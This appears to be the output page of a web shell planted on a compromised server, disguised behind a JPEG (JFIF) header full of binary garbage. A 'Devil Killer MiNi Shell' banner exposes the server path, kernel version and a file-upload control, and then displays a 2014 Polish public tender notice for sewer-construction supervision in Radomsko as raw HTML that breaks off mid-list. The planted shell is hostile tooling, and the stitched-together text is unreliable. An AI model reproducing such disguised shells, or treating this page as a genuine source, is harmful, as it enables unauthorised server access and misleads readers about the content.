JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140626/214798-N-2014.html

<p class="kh_header"><b>Radomsko: Pełnienie funkcji nadzoru inwestorskiego przy realizacji zadania inwestycyjnego 
    w ramach projektu: Rozbudowa kanalizacji sanitarnej na terenie aglomeracji 
    Radomsko</b><br>
<b>Numer ogłoszenia: 214798 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka  z o.o. , ul. Stara Droga 85, 97-500 Radomsko, woj. łódzkie, tel. 044 6830630 w. 45, faks 044 6834377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk-radomsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. 100 % udziałów jest własnością gminy miasta Radomsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji nadzoru inwestorskiego przy realizacji zadania inwestycyjnego 
    w ramach projektu: Rozbudowa kanalizacji sanitarnej na terenie aglomeracji 
    Radomsko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienia funkcji nadzoru inwestorskiego przy realizacji zadania inwestycyjnego 
    w ramach projektu: Rozbudowa kanalizacji sanitarnej na terenie aglomeracji 
    Radomsko. Nadzór inwestorski obejmuje branże: instalacyjną, elektryczną i drogową.    
    Zadanie jest dofinansowane w ramach Programu Operacyjnego Infrastruktura i 
    Środowisko na lata 2007-2013 - priorytet I, działanie 1.1. Gospodarka wodno-ściekowa w 
    aglomeracjach powyżej 15 tys. RLM.

    Wybrany Wykonawca robót: PROBUD  Jarosław Dąbrowski  ul. Soplicy 19,  
     97- 500 Radomsko.
    Wartość robót dla zadania A2 wg umowy: 1.466.467,50 zł brutto z VAT.
    Wartość robót dla zadania B2 wg umowy: 2.710.242,50 zł brutto z VAT.

    Przedsięwzięcie jest zlokalizowane na terenie miasta Radomska, w powiecie 
    radomszczańskim, w województwie łódzkim, na terenie osiedli: Bogwidzowy i Sucha 
    Wieś.    
    Przedsięwzięcie objęte nadzorem inwestorskim jest częścią szerszego projektu noszącego 
    nazwę: Rozbudowa kanalizacji sanitarnej na terenie aglomeracji Radomsko. Projekt 
    obejmuje 2 kontrakty, z których kontrakt nr 1 został zrealizowany w roku 2012. 
    Przedmiotem niniejszego postępowania jest kontrakt nr 2, nad którym sprawowany będzie 
    nadzór inwestorski obejmujący zadania A2 i B2:   

    Zadanie A2 - Budowa kanalizacji sanitarnej os. Bogwidzowy w ul. Jeżynowa, Pasieczna, 
                          Przemysłowa, Ziołowa

   Zakres rzeczowy zadania inwestycyjnego obejmuje wykonanie robót:

- kanalizacji sanitarnej O 200 i O 250 (z rur PCV-U ze ścianką litą SN8 SDR-34 klasy T wg PN-EN 1401:1999  o średnicy Dz 200 x 5,9 mm Dz 250 x 5,9 mm łączonych na uszczelki) o łącznej długości L = 1 116,0 mb wraz z elementami sieci O 160 do granic działek o łącznej długości L = 224,5 mb  ( kanały sanitarne boczne z rur  kielichowych z PCV-U ze ścianką litą SN8 klasy T wg PN-EN 1401:1999 o średnicy Dz 160 x 4,7 mm łączone na uszczelki ), wraz z odtworzeniem nawierzchni.

Zadanie B2 - Budowa kanalizacji sanitarnej os. Sucha Wieś w ul. Siemiradzkiego, Starowiejska, 
                      Partyzancka, Strażacka, Strzałkowska

Zakres rzeczowy zadania inwestycyjnego obejmuje wykonanie robót:

- kanalizacji sanitarnej O 200 ( z rur PCV-U ze ścianką litą SN8 klasy wg PN-EN 1401:1999 o średnicy Dz 200 x 5,9 mm łączonych na uszczelki ) o łącznej długości L = 2 109,0 mb wraz z elementami sieci O 160 do granicy działek o łącznej  długości L = 349,0  mb (kanały boczne sanitarne z rur kielichowych z PVC-U ze ścianką litą SN 8 klasy T wg PN-EN 1401:1999 o średnicy Dz 160 x 4,7 mm łączonych na uszczelki), kanalizacji tłocznej O 110 i 125 PE o łącznej długości L = 643,0 mb oraz tłoczni ścieków P1 i P5 wraz z odtworzeniem nawierzchni.

2. Szczegółowy zakres rzeczowy nadzorowanego zadania inwestycyjnego określają 
     następujące dokumenty:

- dokumentacja projektowa ks. os. Sucha Wieś - część I, 
- dokumentacja projektowa ks. os. Sucha Wieś - część II,
-  dokumentacja badania gruntowo - wodne  os. Sucha Wieś część I, cześć II,
-  dokumentacja sterowanie i monitoring przepompowni ścieków,
-  dokumentacja specyfikacja techniczna wykonania i odbioru robót budowlanych os. Sucha 
   Wieś - część I,
-  dokumentacja specyfikacja techniczna wykonania i odbioru robót budowlanych os. Sucha 
    Wieś - część II,
-  kosztorysy - przedmiary robót os. Sucha Wieś,
-  decyzje administracyjne os. Sucha Wieś,
-  skan odcinka inwentaryzacji w celu dalszego wykonania ks. dla części I i II,
-  dokumentacja projektowa ks. os. Bogwidzowy - część I,
-  dokumentacja projektowa ks. os. Bogwidzowy -  część II - elementy sieci,
-  dokumentacja - opinia geologiczna  oś. Bogwidzowy,
-  dodatkowe wyjaśnienia i informacje dla budowy ks. w ul. Pasiecznej,
-  skan odcinka inwentaryzacji w celu dalszego wykonania ks. dla części I,
-  dokumentacja specyfikacja techniczna wykonania i odbioru robót budowlanych  
   os. Bogwidzowy,
-  kosztorysy - przedmiary robót os. Bogwidzowy,
-  decyzje administracyjne os. Bogwidzowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść 
      wadium w wysokości 2.000,00 PLN ( słownie: dwa tysiące złotych ).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 

      Forma wadium

Wadium może być wnoszone w jednej lub kilku następujących formach:
    1) pieniądzu; 
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
        kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
        z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości       
       ( Dz. U. z 2007 r. Nr 42, poz. 275 ). 

      Miejsce i sposób wniesienia wadium
Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy 
      Zamawiającego:
        Bank PEKAO S.A., konto nr 36124031321111000029671261 z dopiskiem: 
                     Wadium na pełnienie funkcji nadzoru inwestorskiego
 Jeżeli wadium zostanie wniesione w formie, o której mowa w ppkt 2)-5), 
       wówczas Wykonawca składa oryginał dokumentu potwierdzającego wniesienie wadium 
       razem z ofertą.
       Dokument gwarancji lub poręczenia stanowiący formę wadium musi zawierać 
       w swojej treści stwierdzenie, że gwarant zobowiązuje się bezwarunkowo i nieodwołalnie 
       pokryć wszelkie zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów 
       zawartych w art. 46 ust 4a i ust 5 ustawy Prawo zamówień publicznych do wysokości 
       gwarantowanej kwoty, na pierwsze pisemne żądanie Zamawiającego wzywające do 
       zapłaty w okresie obowiązywania gwarancji. W dokumencie tym gwarant/poręczyciel nie 
       może uzależniać dokonania zapłaty od spełnienia przez beneficjenta dodatkowych 
       warunków lub czynności. Dopuszczalnym przez Zamawiającego żądaniem gwaranta 
       może być np. żądanie oświadczenia beneficjenta o przyczynach zatrzymania wadium 
       oraz dokumentu potwierdzającego, że osoby, które podpisały wezwanie do zapłaty w 
       imieniu beneficjenta, upoważnione są do jego reprezentowania.      
Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, Wykonawca dołączy do 
       oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu 
        przelewu należy wpisać: Wadium na pełnienie funkcji nadzoru inwestorskiego.
Gwarancja/poręczenie musi być wykonalne na terytorium Rzeczypospolitej Polskiej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie 
        Wykonawca jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować 
        realizację przynajmniej dwóch usług pełnienia funkcji nadzoru inwestorskiego przy 
        realizacji robót budowlanych polegających na budowie kanalizacji sanitarnej o wartości 
        równej lub przekraczającej 2,5 mln zł brutto każda w okresie ostatnich trzech lat przed 
        upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w 
        tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na 
       rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały 
       wykonane należycie - wg wzoru stanowiącego załącznik nr 4 do SIWZ.
       Dowodami tymi zgodnie z § 1 ust. 2 pkt 1 i 3 rozporządzenia Prezesa Rady Ministrów z 
       dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać 
       Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane 
       ( Dz. U. 2013, poz. 231 ) są: poświadczenie lub oświadczenie Wykonawcy - jeżeli z 
       uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie 
       uzyskać poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym Zamawiający 
      nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest 
      wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonywania zamówienia  
      zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami 
      zdolnymi do wykonania zamówienia w następujących specjalnościach:

 a)  jedną osobą, która pełnić będzie funkcję inspektora robót branży sanitarnej 
  posiadającą określone przepisami ustawy Prawo budowlane ( tj. Dz. U. z 2013 r. poz. 
  1409 z poźn. zm. ) uprawnienia do kierowania robotami budowlanymi w specjalności 
  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych oraz wodociągowych 
  i kanalizacyjnych bez ograniczeń, w zakresie wymaganym do realizacji zadania lub  
  odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej   
  obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w 
  zakresie wymaganym do realizacji niniejszego zamówienia. 
      Doświadczenie zawodowe - minimum 5 letnie doświadczenie w pracy na stanowisku  
      kierownika budowy/robót i/lub inspektora nadzoru.
      Informacja ta winna zawierać:
    - przedmiot zamówienia ( wykaz prowadzonych robót ),
    - podmiot, dla którego realizowane było zamówienie,
    - daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy/robót 
       i/lub inspektora nadzoru.



     b) jedną osobą, która pełnić będzie funkcję inspektora robót branży elektrycznej  
         posiadającą określone przepisami ustawy Prawo budowlane ( tj. Dz. U. z 2013 r. poz. 
        1409 z późn. zm.) uprawnienia do kierowania robotami budowlanymi w specjalności 
         instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez 
         ograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie 
         wcześniej obowiązujących przepisów upoważniające do kierowania robotami 
         budowlanymi w zakresie wymaganym do realizacji niniejszego zamówienia.
         Doświadczenie zawodowe - minimum 5 letnie doświadczenie w pracy na stanowisku  
         kierownika budowy/robót i/lub inspektora nadzoru.
         Informacja ta winna zawierać:
      -  przedmiot zamówienia ( wykaz prowadzonych robót ),
      -  podmiot, dla którego realizowane było zamówienie,
      - daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy/robót 
         i/lub inspektora nadzoru.
 
     c) jedną osobą, która pełnić będzie funkcję inspektora robót w branży drogowej 
         posiadającą określone przepisami ustawy Prawo budowlane ( tj. Dz. U. z 2013 r. 
         poz. 1409 z późn. zm. ) uprawnienia do kierowania robotami budowlanymi bez 
         ograniczeń w specjalności drogowej lub odpowiadające im uprawnienia, które zostały 
         wydane na podstawie wcześniej obowiązujących przepisów upoważniające do 
         kierowania robotami budowlanymi w zakresie wymaganym do realizacji niniejszego 
         zamówienia. 
         Doświadczenie zawodowe - minimum 5 letnie doświadczenie w pracy na stanowisku  
         kierownika budowy/robót i/lub inspektora nadzoru.
         Informacja ta winna zawierać:
      - przedmiot zamówienia ( wykaz prowadzonych robót ),
      - podmiot, dla którego realizowane było zamówienie,
      - daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika budowy/robót 
         i/lub inspektora nadzoru.

    UWAGA!
1. Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które realizować będą    
    niniejsze zamówienie, pod warunkiem, że osoba ta spełni łącznie wymagania dla każdej z 
    łączonych funkcji. 
 2. Tam gdzie w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach, 
    należy rozumieć uprawnienia budowlane zgodnie z art. 12, art. 12a oraz art. 14 ust. 1  
    ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( tj. Dz. U. z 2013 r. poz. 1409 z późn. zm. )  
    lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie 
    wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane 
    obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji 
    Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy prawo budowlane 
   oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach 
   członkowskich Unii Europejskiej ( Dz. U. z 2008 r. Nr 63, poz. 394 ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za warunek spełniony, jeżeli Wykonawca wykaże że:
  - posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    związanej z przedmiotem zamówienia, co najmniej na kwotę 100.000,00 zł ( słownie: 
    sto tysięcy złotych ), a w przypadku jego braku, innego dokumentu potwierdzającego, że 
    Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
    działalności związanej z przedmiotem zamówienia.

     UWAGA!
     Wartości podane w walutach innych niż wskazane przez Zamawiającego Wykonawca 
     przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz ofertowy o treści zgodnej z określoną we 
    wzorze stanowiącym załącznik nr 1 do SIWZ.
2) Wykaz części zamówienia, które Wykonawca zamierza zlecić podwykonawcom. Wzór wykazu znajduje się w załączniku nr 6 do SIWZ. 
